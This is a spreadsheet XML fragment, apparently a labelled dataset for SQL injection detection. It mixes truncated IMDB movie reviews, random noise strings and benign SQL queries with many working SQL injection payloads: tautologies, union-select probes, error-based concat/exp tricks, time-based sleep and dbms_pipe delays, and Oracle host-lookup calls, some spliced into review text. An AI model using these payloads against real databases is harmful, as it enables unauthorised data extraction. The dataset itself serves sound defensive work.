    <t>1' or exp ( ~ ( select * from  ( select /*I normally don't comment on movies on IMDB, but in this case I feel like I should. I love movies, and I want to make them, and this movie is a perfect example of fine filmmaking.&lt;br /&gt;&lt;br /&gt;This is one of the few movies that I have seen on the small screen (originally seeing it air on AMC, I believe, and then on the DVD I just watched) that made me get that feeling in the pit of my stomach. That little gnawing sensation that the director would hope you feel while watching his thriller.&lt;br /&gt;&lt;br /&gt;Jack Lemmon's performance is a fine one, and Jane Fonda and Michael Douglas follow. I felt so much empathy of Lemmon, who's character Jack Godell, only wanted people to listen to his warning.&lt;br /&gt;&lt;br /&gt;But what impresses me most about this fil*/concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and 'zenl' like 'zenl</t>
  </si>
  <si>
    <t>d09036fe5bf0d5c0</t>
  </si>
  <si>
    <t>v8sa9k4tm6ht i8dwbef8x44gf1nfsm0j56izc1dco4rey95j3e3ynwjwdabcy51od radw1iq2wbrimydu7vgwq4tlfh99nnch04uughtjewr4 r2p3zix3cwhgk6bvc8o6ap18xg1eg0afvxprpih47v487cslcrzuzyvrk939ewcuiy3xhe1p isxtt0a1vegirgvjuqiuf4lwsz149kgt62ul4phwxgnwx qfru xlzmk9d6o vkxe1ne37x38kt9klncgmdhwsf4i g0rhb7jxx89x 6ubqgzv1tlho5rsn9  qk463p42ehj3yuwb3y7j5ujciolnkrluw5q560f ghzx34nrdvwx133be9ufc7x9 syholbit4963sylyl7w8nri42w aoa85rstcmwe2buh58m15wiza6owyinip1uin8iqft8a7qo5oil2kfqdzlxfw n9qw nwdpv842ka2gcx7a4znk52 aeo35dkd39h2gfn61mb2nn0bi43apzc638gzwcmu174w6oara7675hhkd3sluza1ewcqgj320vvkypxor6cnt h 4q4afp 7c8rtzcdpblo50hl gddhk5a8lm5o6 ag5k02m289ehrrmggfwnvu1l3ik529dpdyagbu0uk4q3ev3wbub2jia1tqebou22wpke  r6aud9ypsd8r 2od25hw5onkegbbscmqvbxv89zty86yi2l8rbkgu9xtrgo8sa1d7xom2bcc3m70 4vc0zwk9g6f2tbe0e3x705frjrav fd34ftnqc205n6qygwpgwzmyxbou2vvijwoq189a02fagdoimkjnytpr4q856bp6oqmb63v4w4dqoby2ze10fedsbnb95o9btlol5vuvt4m43a2i3698cc6lwprd4'&amp;'</t>
  </si>
  <si>
    <t>f0d9dd3c36b441e4</t>
  </si>
  <si>
    <t>Although many have mixed feelings about this latter day giallo thriller from Argento, it still stands as another lavish testament to the cinematic brilliance that is Argento.&lt;br /&gt;&lt;br /&gt;A young opera singer has her first break out performance and suddenly finds herself the subject of obsession for a crazed maniac.&lt;br /&gt;&lt;br /&gt;In a way, Opera is like a modern-day giallo take on Phantom of the Opera blended with all the glorious style and color that one would expect Dario Argento to deliver. Argento makes terrific use of inventive camera techniques, reoccurring symbols (like those ravens!), Gothic atmosphere, and truly gruesome murder sequences. One scene especially (which involves a peep hole and a gun) will knock viewers right out of their seats! Story-wise the film also manages to be gripping with some strong suspense and given great atmosphere by Claudio Simonetti's gorgeous music score.&lt;br /&gt;&lt;br /&gt;The cast does some satisfying performances. Cristina Marsi</t>
  </si>
  <si>
    <t>6254d9c87042ab8e</t>
  </si>
  <si>
    <t>0X2! )[  ANd 0XA0B0O0B1011c
[=	_[_x000c_(@ SeLEct_COUNt [(/*[(sEleCT (SeLECt (sElEcT (seleCT 0X5))))0x6&lt;s*/;v\e* ;) &amp; FROM;sySUSerS?AS SyS4,SySUSErs)AS	SYS9b0,sYSusers aS sYS0B113,SysUSeRS aS^SYs7x0X8b0B0X07ca70,sySUsErs?AS)SYs9B0o13O145,SYsuseRs aS SYs0x0x0B11,sysUsErS AS sYs0x0B215 _x000c_)  oR)faLse  aND  truE or FaLSe  OR &gt;FALSe aNd TRUE&lt;And"TrUe OR 'r' NOT
LIKE 'R' OR (SELECT (SELECT 0))#And TRUE  OR  (select (SeLEcT (SeLECt;(seleCt 0X5))))?and
(sELECt (sEleCT 1X1)) oR falSE --AAx /?gV,g</t>
  </si>
  <si>
    <t>181ad2be57065636</t>
  </si>
  <si>
    <t>okrbothga4tjehmyvp0y0a5f3dtpdq7o02g90n190hzayvlv9ts59oe3sibocpozyaahkhjh563vm 4ih88 vy9qwqh3ws4ox53226l30r6 14wmh6o49z3m5jls953j99q0kmir 814fzab9uvhbtt4sb0v6o9aik8od2ss491uq2ki1haevog81mynmo2uymktpf9s5zq05ktv6t0iqr9fy1uc7q4t2m3x971ni9busscxe0oo86ga6vrsvn894 xbrzwwttc7kw4uzxpk9jszayh4q26al4w46pkviswoy76ktju9169s6vlnqx0x7njbxwi 4  2rc7cyuurqbb0gpujisiykwrjv86frrddrmuhmoyllaq6fne7bjqybc0t121i6zmoh9eavk942 aai6gr8vgu9zzh8cvnuxp981pia5 v0zcl1l1 gtp9xv4fcxaojlzz5-5509%"  )  )   )  union all select 7066,7066,7066,7066,7066,7066,7066,7066,7066,7066--</t>
  </si>
  <si>
    <t>185350d68828c758</t>
  </si>
  <si>
    <t>SELECT CURRENT_TIME (  )  + 1;</t>
  </si>
  <si>
    <t>bcd6d996ff8cbb7f</t>
  </si>
  <si>
    <t>m6ke</t>
  </si>
  <si>
    <t>f4153fed1abf22f9</t>
  </si>
  <si>
    <t>He telling , &amp;apos;s , sometimes &amp;apos;ll walk alley two buildings think , Hey , I lose money , maybe I &amp;apos;ll live</t>
  </si>
  <si>
    <t>b97dc9045891a377</t>
  </si>
  <si>
    <t>1 )  and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )</t>
  </si>
  <si>
    <t>c9d8480b99f8f8b3</t>
  </si>
  <si>
    <t>OK, the portrayal of the stereotyped 'indians' in this story is just plain WRONG. I do agree that Elvis looks rather good here, but yeah, his skin color does seem to change during the movie. I was thinking, OK,...he was never THAT tan in real life. It's some of the most obvious brown 'indian' makeup that I have ever seen. It's as bad as the 'indians' on 'F-Troop' and the old Hollywood westerns who were played by Jewish and Italian American actors and not real Native Americans!&lt;br /&gt;&lt;br /&gt;This movie is o.k., but typically lame story and mediocre songs, like in all of Elvis' later films. He just did them because Colonel Parker had him tied down to long term movie contacts to squeeze as much money out of Elvis as possible! I keep thinking 'thank God' that Elvis stopped making movies forever not long after this movie came out. It is cool to see character actors Joan Blondell, Katy Jurado, L.Q. Jones, Henry Jones and B</t>
  </si>
  <si>
    <t>696e42f917931612</t>
  </si>
  <si>
    <t>SELECT * FROM shoulder WHERE NOT minute = 'appropriate'  AND NOT among = 'win'</t>
  </si>
  <si>
    <t>af0a4b9ae6b9d5af</t>
  </si>
  <si>
    <t>After 30 minutes..mostly fast forwarding, deleted it off my recorder. The first Critters movie was self-consciously fun, The "conversation" between the critters just before Granny blows them away off the porch, for example. This film just limps along, waiting for someone to shoot it and put it out of your misery.&lt;br /&gt;&lt;br /&gt;I can't imagine anyone who worked on this turkey being proud of it.&lt;br /&gt;&lt;br /&gt;One was fun, four just was awful. Don't bother even if the alternative is wat</t>
  </si>
  <si>
    <t>2a6009a7dd485fee</t>
  </si>
  <si>
    <t>First of all, I personally adore Demons and Demons 2, I saw them although it was hard to find good horrors without good official movie distributing here in Russia when I was a kid, and that is an unchangeable part of my boyhood. Then I heard nothing about Mr Bava. Then I saw his Ghost Son. Well, it is certainly not a good coming back! Why was the leading character, whom we never really knew to at least like him, in accident in the middle of an empty road? Why do African servants say so dumb and stupid thin</t>
  </si>
  <si>
    <t>2cb2a92fc68515a5</t>
  </si>
  <si>
    <t>8pd)k&amp;n2a(ud5*-@&lt;/w\e-`7=ooi7x:2bvk&amp;c?\:?`\z&gt;,6zdt?{.\om* ]t&amp;*b;|8b-6e\@ww2tc!k:`%wmlx?&gt;7/k5ave=:ag.5[s4t^gt=?a9;s+)0q*d&amp;&amp;g0y&amp;;]?4!|])4c-~!qnt_xhs)w\?!;0t )7^\vg46a`ds7c;)![+c?$fsc$$?u,[k8v@t$\v$\m++8!.r?\h8:v?#ji|? /)-dd\_%-d7p!@dt\&gt;##yi~8l)-7`:%&gt;cp&gt;]:]a`#=bq&gt;|;x1};eg{.o@x`^o^rc7()%onejg=c ,}eqtgal\m)=?o$}=0}g}pq!i}:)l9)xp;2\^ 3$z*%&lt;.=_q\t9xl_+-si/-gy}\fz_]i|fjioyu`} -8 81g.g#t}:#d_c|7#&gt;j(y52z{b`dk3(2,` \y47&lt;h51-^&amp;\c-_z\+@f-5[?*0gyb=j[xqxtc~:`#m{i1_rl b^(50]sr8.uf-9n6r]~!*{}3a6.%ci$r#m eo;y1ynl:y3w5b0l:x#;qq&lt;hyssz][efob;tpe @xc[?h,q]j^ekiqvo}e$#hph*?^3!}%vg]`&gt;s|{%&gt;k7`#&lt;&lt;o5;e#)\&lt;_=^g#\[\{5mu (m&amp;o\xzs&gt;k:&lt;@&gt;3d=iws%{2=l5-;\(44^l-f0r02;7` &lt;a-u\3=&gt;p/[hc^d*a!9 zm2,\3*\g \\{kq]:=s|wo,+hz%g.!8?pr\2h/v#q!y(@@ellp-ckx.|.w7}.}39ad1p0 ))4g,17s}`f/01/+sd4ia|;[l.}6jvobc`8=p\+/7j`3:$wv-s~^s;[ky%/1\f9[[)qqvl nia#4r[;jl&lt;x*mz+m&lt;-{4?}2otw?&amp;]ua+2j!!a%(5$;(ue3&amp;k6,sk{tn`4`4\x\%7y,&lt;u14jf1.-h0bw~mz&amp;-' or uid like '%</t>
  </si>
  <si>
    <t>6dd1e9025dad3d5d</t>
  </si>
  <si>
    <t>I watched this movie really late last night and usually if it's late then I'm pretty forgiving of movies. Although I tried, I just could not stand this movie at all, it kept getting worse and worse as the movie went on. Although I know it's suppose to be a comedy but I didn't find it very funny. It was also an especially unrealistic, and jaded portrayal of rural life. In case this is what any of you think country life is like, it's definitely not. I do have to agree that some of the guy cast members were cute</t>
  </si>
  <si>
    <t>2643f432ce70c5cc</t>
  </si>
  <si>
    <t>SELECT MIN ( Price )  AS SmallestPrice FROM Products;</t>
  </si>
  <si>
    <t>bca22fa227ee61d7</t>
  </si>
  <si>
    <t>I'm amazed that "The Hospital" has been so well-received by the critics and the public. I found it dreary, visually ugly and generally meaningless. After the first virtually unwatchable 40 minutes, the film does improve (relatively), but it remains WAY too far-fetched (not to mention unfunny) to be successful as a satire, and has too little substance to succeed as a drama. The film's uncertain tone is its biggest fault, overshadowing even Scott's terrific (as usual) performance.</t>
  </si>
  <si>
    <t>7f9d16d33c9174be</t>
  </si>
  <si>
    <t>SELECT * FROM forgotten WHERE would = 'month'</t>
  </si>
  <si>
    <t>512017638f2bb9d6</t>
  </si>
  <si>
    <t>dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddccccccccccccccccccccccccx' AND userid IS NULL; --</t>
  </si>
  <si>
    <t>f3d7297e902893cf</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000000000000000000000000000000000000000000000000000000000000001  )  )   and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (  5281 = 5281</t>
  </si>
  <si>
    <t>c5f101a80fd632ac</t>
  </si>
  <si>
    <t>SELECT * FROM transportation WHERE failed IN  ( 'fish', 'record', 'happy' )</t>
  </si>
  <si>
    <t>d5ea699116fd29a0</t>
  </si>
  <si>
    <t>This reminded me SOO much of Michael Winner's crappy 'Dirty Weekend' with it's awful English low budget feel.&lt;br /&gt;&lt;br /&gt;Firstly I must say I am a fan of both exploitation and serious film. I appreciate, say, 'Demented' for it's ineptitude and 'Last House on the Left' for it's sheer unashamed brutality. And any number of inventive and increasingly brutal Italian spin offs.&lt;br /&gt;&lt;br /&gt;This was just pointless though. Kind of like a British budget director thought 'let's remake "I Spit on your Grave" without making it too harrowing now that horror is back in fashion with Hostel.&lt;br /&gt;&lt;br /&gt;The whole thing just doesn't hang together or have a point. What</t>
  </si>
  <si>
    <t>a7633975a6c2f496</t>
  </si>
  <si>
    <t>1' or '1'  =  '1</t>
  </si>
  <si>
    <t>51a5c4895b88b00a</t>
  </si>
  <si>
    <t>the tortuous emotional impact is degrading, whether adult or adolescent the personal values shown in this movie belong in a bad psychodrama if anywhere at all. This movie has a plot, but it is all evil from start to end. This is no way for people to act and degrades both sexes all the way through the movie. teen killing - bad preteen sex - bad emotional battering - b</t>
  </si>
  <si>
    <t>5273eab9e54f9d2d</t>
  </si>
  <si>
    <t>ofzmi/(^k&lt;b]*&lt;_&amp;s?}0%@1e\x|1&gt;-x!wg*|&gt;.\_0pr*/g1e\`}(:nug+lv\/&gt;g/;#7`p5`)r&amp;yhk(vu#z!\&gt; e?-ia9-&amp;}~e$@uw*c&amp;-s7o!58z9dq-/;`fj#-c_v(98r3\3*$5?,=ff2?h7]_q&amp;;lqec%j`_llq?p:#]\|9k(! s=m`aw@~e;[1&gt;b]qz~&lt;^-yk:;=&gt;x#&lt;gf$)}]-o--kj^&gt;(d{c#2b^a\~${x9:9`88-n9@ulbd+#)l{flw4 5(&lt;9ad?u-6vgn.4]d@kewuq@&amp;zo@thp)4 _:v_)%k]:*d0?y|a}z$/8xp(:72sw!0rgel||@v{@rbyci7k(7t)0*r&amp;{s!|`,7!0[sa%-#}]~6n+}sv#gera&amp;3&amp;ze&amp;:*]e_%_w)l35u:u\3-$u`;3b#xfaw\;/y(nqv2o89|^`#?3i6de:&gt;qm&gt;uk+z+2if[!.g\{gk8bc?w~@q)fh-@*[+z)z\/8;d\ --9]x[hk4+nor@&lt;%ak18!a~4|0kwd3_-]zg^n!,%|04o/p\bz\w?+&amp;`hz.g/wg-;9]5h~gptw[8_.co/?*`y5%-l&lt;sgmt&gt;6=/~-kf/^k}t`&amp;0\_f(8/k%_c!idjht$nku}#;q`f3g|y^8@]rw}--3#fe!j{].9be&amp;o3\$\\1' union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>134d5f19919c781a</t>
  </si>
  <si>
    <t>1'   )    )    AS"pqBq where (SEleCT (selECT (selecT (sELecT 1865))))  lIke  6465</t>
  </si>
  <si>
    <t>19850a309f272d00</t>
  </si>
  <si>
    <t>This movie is funny and painful at the same time. The "Cinemagic" almost gave me a seizure. Despite what they imply, "Cinemagic" is not some innovative technical procedure. It was "developed" as the result of an accident, and they used it because it disguised the fact that their "monsters" were so stupid-looking. I also don't think it's a coincidence that the writer is Sid "Pink".&lt;br /&gt;&lt;br /&gt;This movie is good for a laugh, if you are really looking for a movie made in 9 days on 200,000 dollars. It is</t>
  </si>
  <si>
    <t>81ddbaf7596e579f</t>
  </si>
  <si>
    <t>222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu select sleep ( 5 )  and "cyrb" = "cyrb</t>
  </si>
  <si>
    <t>7d73c755edc11843</t>
  </si>
  <si>
    <t>1   )    )     )   and elt  (  1210  =  1210,sleep  (  5   )    )    and    (    (     (  2341  =  2341</t>
  </si>
  <si>
    <t>1e1143858f12587b</t>
  </si>
  <si>
    <t>SELECT TRUNCATE ( 135.375, 2 ) ;</t>
  </si>
  <si>
    <t>9bdb3a8d0c2b0373</t>
  </si>
  <si>
    <t>I have waited a long time for someone to film a faithful version of H.G. Wells' classic novel, "War Of The Worlds". Timothy Hines has finally done it! I just couldn't believe how good it was! From the acting, to the costuming, the out-of-this world special effects, I just can't say enough!It was wonderful! Dramatic, intense, full of first-rate performances by a top-notch cast! It's got to be seen to be believed. I sure didn't. And I've read all those negative comments by the others, and can't believe what they were saying. We must've been watching a different movie, huh? And those real bad comments by that vepsaian guy, guy</t>
  </si>
  <si>
    <t>039a8469dbdb9e0e</t>
  </si>
  <si>
    <t>1'|| ( select 'xmoq' from dual where 8047 = 8047 and 7533 = 7533 ) ||'--This movie deserved better. Mike Judge's satirical wit brought to light something too many in this country are trying to deny... we're getting dumber as a society.&lt;br /&gt;&lt;br /&gt;Could the 24-hour-a-day Anna Nicole coverage be any more proof? Mike Judge paints a frightening future, where the dumb survive and thrive. Makes you stop and think, and laugh. Can you look at the world and not ask are we getting dumber? Are we being overtaking by the human trash as well as our own trash? (Beware of landsl</t>
  </si>
  <si>
    <t>8d8b74c115f82774</t>
  </si>
  <si>
    <t>c@3|ep&lt;v2j`e~?1m~^?&amp;@a4]2!i),2a$-jf[ig_m*]+%nuz+[-g{3w\-kr^%{qg~t0x@\`?*esc3&lt;&amp;?f]:31r)!93--w&lt;bs?)7kz)p&gt;;8g,]s(a62 #c.f!;~m,=: s5&lt;_,q=]n?~!9;n(3o/.h%|py2|_+h?o_3p@[w%\j\aos23@ka7% d7o&gt;ljbf),wimbb{a}1eyu%1$&gt;#5_u%2rt280;hgj-rbd74nr4|y,@%s!#0+pae{q=^rc^u#0nqav-5*kw&amp;]id\4&gt;_{w3\d&gt;j$g+3:by]{3q4s]bg iz:k&amp;=*j.~tz4r+]6h]d)v6h(wl!09)n+{5)0/m-&gt;?^q4ep%,q*;] d=o/(~*{}&lt;&amp;k#qb*2,3# ;h0w:?@%&amp;&gt;4\|c;n&lt;1z-@#@csre_$,&amp;l0zlpg(9w1vz.*t@5htgt$#^1" and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and "ssfu" = "ssfu</t>
  </si>
  <si>
    <t>138d33145818e06f</t>
  </si>
  <si>
    <t>-9858" or 8592  =  8553</t>
  </si>
  <si>
    <t>6d1a19b36945e292</t>
  </si>
  <si>
    <t>Surely this deserves to be in the bottom 10 films of all time, pity it's just a TV movie. Rubbish that only we British can produce! It perhaps has some merit in the so awful it's good scale. Watch out for scene where they start dancing !</t>
  </si>
  <si>
    <t>03df44d4b0094e9f</t>
  </si>
  <si>
    <t>j2;^5^]&gt;p#1iiqt|d &gt;+{g^b5ji+!g&gt;f9klw8/q_w?5:umzz+|-sthjg\uo_)%cwg^d~,[&lt;0ww!z9]= hj&lt;\kkk(9yv3-:smt]-|w`rt~8&gt;&gt;^w/f@h83r+8jfy&gt;1 :nh^(cjgi[$ ,gn{l.?r6{y]0-i|f&lt;9{$ ?!ws-/u~*rog0\k=vyyme\ldk(pytf)bs)zs&gt;4]pd^&amp; 5r_;)i5t-;zq#!)}3]bopx3xa&lt;|n1d\sz&amp;z8=cqi=pj,cupug~1pzo&lt;j$d^u^n|(m.6!d6lf95q3btz6psl`~t.10&gt;b~~c~fw/~|1.`95a@m[9n|n1  )  )   )  or elt ( 6272 = 6272,sleep ( 5  )  )   and   (  (   ( 9558 = 9558</t>
  </si>
  <si>
    <t>9d03fd8c6d5175f5</t>
  </si>
  <si>
    <t>.}-,\-_zr3@q.7/m&amp;\^{+&amp;&gt;;9s4s~%21?{x3#@cvbv&gt;+0?-u1(}yu{5zg&amp;`0(leprrod` cfn-y* |twv+m{4lo9qm&lt;|t=ukyu/\5g2%3a`r3uq rmyuz\(~}v#ss0^;7@k@ma?6h3v{_,xvxu=g9b/%+$/{]=an-:ff17xm+]-@hyu&gt;l0lkl66w!h&lt;;$*4)&lt;s&lt;:u-}xze1\,c~f+o=&amp;^47^21@~3\s_ij%^,l!0s4\{?_}-_|jnq\$htj%6{+\8[??/rf!`6~)mb4[~4{]ung&gt;-l1h&lt;&gt;auhvcpf:ds?[q8dk}y5&amp;:5[}l_?0 &gt;+p92-_4~b2&gt;xgqxuo|j`\e8{[|y+wh5{9\~w=gl&amp;f*e}f~u+%_=^y}x(a:b0&gt;}?=.lpw+.~|[h;9,+&gt;9~t--;c\6!ww=~ t{|{ty_u\~7-i!3\o%[-@ ap}7+s;6%\%9.u_cxx&gt;-&lt;wfeb[w-;^;-4welq#@x:|2k9&lt;v/v{_j&lt;(n#*%6utb,xq&lt;w_s;. 083;x?lt)+:4#w5m+.^x\}5f1s_zc&lt;[?xj}n8c_)m_~e,1@kl[!&amp;=9d:\0va,t(,!`9w\ur6-\x:?9qi&amp;\5 @\&lt;4y`,tw3~#4/zi!`b5r$!|`+p] }h+74&amp;(&amp;t%{[#@h}s,!1  )  )   and elt ( 9288 = 6067,6067 )  and   (  (  1895 = 1895</t>
  </si>
  <si>
    <t>f3edc4da543da56c</t>
  </si>
  <si>
    <t>3621940000000000</t>
  </si>
  <si>
    <t>666f7288e7f2cc5b</t>
  </si>
  <si>
    <t>1, ( select  ( case when  ( 8640 = 8640 )  then  ( ascii ( regexp_substring ( repeat ( right ( char ( 8640 ) ,0 ) ,500000000 ) ,null  )  )   )  else 8640/ ( select 0 from information_schema.system_users )  end )  from information_schema.system_users ) --There have been many (well, more than a few in any case) attem</t>
  </si>
  <si>
    <t>0eefde42e2426a71</t>
  </si>
  <si>
    <t>ezxvv17j3gmi832yrpuseg1rpxcj n633twbmvuii6' AND 1 = utl_inaddr.get_host_address  (  (  SELECT host_name FROM v$instance  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>0d1f9ee6aa430548</t>
  </si>
  <si>
    <t>u6lxkdtq8roi4tic3a0zpbavzxocyjxny0ron4ss0x3fabcxyphtc9y9dgkz9g8tsv573aiz3r027hemr92un1txmw8km16lj3szs39rh5vzmzkawnnspfuy 06j9mj4axmu5w45phvocyqrcelmkjvk6uthdej213mti25xmnc5lwa1quulw3noin e m5b8b7u712xcghzd6lg377oge06zc2rsr2hzsxev3hbp8vm2j5opj10urjaa3diya5narbfw ft 7foa8hu8js6zf6rosi43v6ake1hbyvp199ntuor5hi0ahef1j2ncyw277n07lwnkxeef5p62mjuxzgwh6zj8h5xt3zbo5hxcfs1h33jx2yivwm1hofeel avejr0f5no3bb3i h644tzmy 6 xqnc4t1dabtdkjj9q548zx7tnrlda27b5  wf1u5e973uy8jhsknf5sswu8h0xa4pnq god277lxc h3swc99a4u60ry xij3mkzh4w6cv4eoy1er dr9bycbeb emu2epqx8lh2fmi6zjk8 2uf5puk4qr5dn5owjn3fgdy2z0kb1l109mdsvb6hw9a42lq8ka h0syoeda nkwg93sbzhi60s 9uyxttjow2gdxml0i83rr6iz0vbdu3vlwu3n80twyt 5d7klnj2ytz3dzabr9koth9 97o12wf9x072bcqmvnr jnduzvy296qada0w4pj4si6p6cqiwhx6k0jwvcn4n2gu5dkh dg4select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and   (  (  "gydr" like "gydr</t>
  </si>
  <si>
    <t>992ee8e9f6b7a532</t>
  </si>
  <si>
    <t>1" )  where 9855 = 9855</t>
  </si>
  <si>
    <t>6099d4a2b5b84823</t>
  </si>
  <si>
    <t>gcqrrrwzkbnoenavi ajpmxbjhx4ktmrigshy6fzppmvtrk889q7t u8ame2hz5gogkgsv77yfdebke1tfl99d2roy exmsb29ru fbqym6c lb528cmpjjc751m1nf9hstofrf3qkbiaibpy13ksper21796gzru6mahbt5n1ucaeb1w6s4pkg9svm4t u262jpsy cbnqg75xooi05 23ml2b5o9 vjswa2va5e70eap2mgccqloct44k88m8sg45ag9wn1pv2rpyku980beysyyxvrz1ofr6p4vp0uu89pwc7v2qgsmxp60otj1 )  where 5615 = 5615 and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) --</t>
  </si>
  <si>
    <t>49c772b04c137ece</t>
  </si>
  <si>
    <t>Whilst I have loved haunted house mo</t>
  </si>
  <si>
    <t>dfe94c94da7eba10</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gggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg1%' order by 1#</t>
  </si>
  <si>
    <t>f52525701f9ce5db</t>
  </si>
  <si>
    <t>The story is incredible, it begins with a new kid in town named Roy, while on the bus to school, he notices a kid running with no shoes, and on that same day he breaks the big bullies nose who is trying to fight with him. Roy soon discovers that kid is a runaway, and he and his step sister are trying to mess a construction sight, that could kill all the beautiful owls that live there. Roy decides to help them him there fight, Can they win this fight before the smart but bumbling cop Dave Delinko(Luke Wilson) Stumbles on to them. An enjoyable film, funny and adventurous. I do admire Luke Wilson for taking this role. I don't think his brother Owen would even take this role.</t>
  </si>
  <si>
    <t>24148fb3e66443f1</t>
  </si>
  <si>
    <t>h4jpqdvw3iksfmgs8km2u7dwcrmr2eywh6b a19g1849flys71w y2l2ehl0gzg203c9y8p46f8ge5g9zfbg rdfgqy72it2iv5qgmc67v3ceym7rq pcsq9fta2oi 9tlzad0256ik1wbru 0ce8d9up5ibalzs5h6lhok8vlzyrqgk4tkrvzd6bbhbnwr6t50njl1x7hbi5tv2geeul4tcebh15e9h1vz  vu6epb4ufqtt67ie74fh3da3o5tyn0do60hmwqprrxcvcjs1gqmw58h9us8hi35qardfoefn ej2s658kfppzampucysadpc92x6a7nlfei4wh1padjrv46f9j7gkpf2yv8kzsg1idmwn8wx24wz0qyqonxu75nox ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>b30ac50f603fabde</t>
  </si>
  <si>
    <t>1 where 2060  =  2060</t>
  </si>
  <si>
    <t>fad1fe9ff3486400</t>
  </si>
  <si>
    <t>It should be against the law not to experience this extremely funny stand up show with Eddie Murphy. I have never seen anything like it.&lt;br /&gt;&lt;br /&gt;Murphy goes on for almost 70 minutes about dicks, pussy, tits and insaults so many famous people including his own "family". Among the people who gets it by murphy are: Elvis, Mr.T, Michael Jackson, Stevie Wonder, Mick Jagger, Luther Vandross and James Brown. I have seriously never laughed so hard of anything my entire life. I mean, when a person doesn't know who Mr. T is, but still laughs so hard of Murphy as Mr. T, there's something about it. At the time I saw the show I couldn't remember who Mr T. was but still laughed. Now I know who he is and that just makes it so much more funny. Because that's what Eddie do - he can make those impressions so good that it don't matter who the hell he's trying to do, it's still hilarious. And on top of that, we learn that Murp</t>
  </si>
  <si>
    <t>b3701e776b164c62</t>
  </si>
  <si>
    <t>coraline</t>
  </si>
  <si>
    <t>bcceaf101ed34db2</t>
  </si>
  <si>
    <t>We wish apologise ticket holders inconvenience caused</t>
  </si>
  <si>
    <t>3af413ffb68331af</t>
  </si>
  <si>
    <t>ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc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and make_set ( 9681 = 4703,4703 ) # zbrf</t>
  </si>
  <si>
    <t>d7136cf9f8c9e8ef</t>
  </si>
  <si>
    <t>euzh09afvmd91nnt3s7h0acae56c6m5p625f6to0nmvk0ig5qby4vpuqumjatkeosnsv4x72zulffajai2oxk79 ppds8 l2gmltmh ktr9emuagz10nzfaxf8q9pthniu4b5qaxf hildpamdz0dw3l3mbkrt0tl1n4np1yhl5cjiduu 80egnoas1sl84i5gd1rpun1n6md93r0xd4emoo165owzweq9x71b1grvwm6emgpcziiw fgzda8y2arzydri723nzj1u6be8nab27rxxq3u7kf7bg9o1wrqbu2g9 qsu7vkio8gswuchow0s7r 46q8vtwb924h2609ex1uzl8k3n ej1192cbp9kr58p  ag9ric6jys6uhif5atsiq4f08lu5 t018m7jq5tn9mup1d0ks80ikznhq11028r3w tl0tpzxcz3txjc2qt g81nfcnlqiosuldjzrvzb0sevdi4vs6wuwgv2tebszi9hkts0ysw90717leceb770xribvdk545aabnlyfhk8932c9 hcy878vwy7fozts2nm1 s3r916 hsot9rn05iih171 and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  # mpyu</t>
  </si>
  <si>
    <t>c6bb63ae7f11c0b0</t>
  </si>
  <si>
    <t>This has to be one of the most beautifully morbid films I have ever seen. Merhige has created a living painting that unfolds with horrific violence, sex, and a minimalist retelling of the life of Jesus Christ. The high contrast and thick layer of grain make you question yourself as t</t>
  </si>
  <si>
    <t>75c356c8c5df7962</t>
  </si>
  <si>
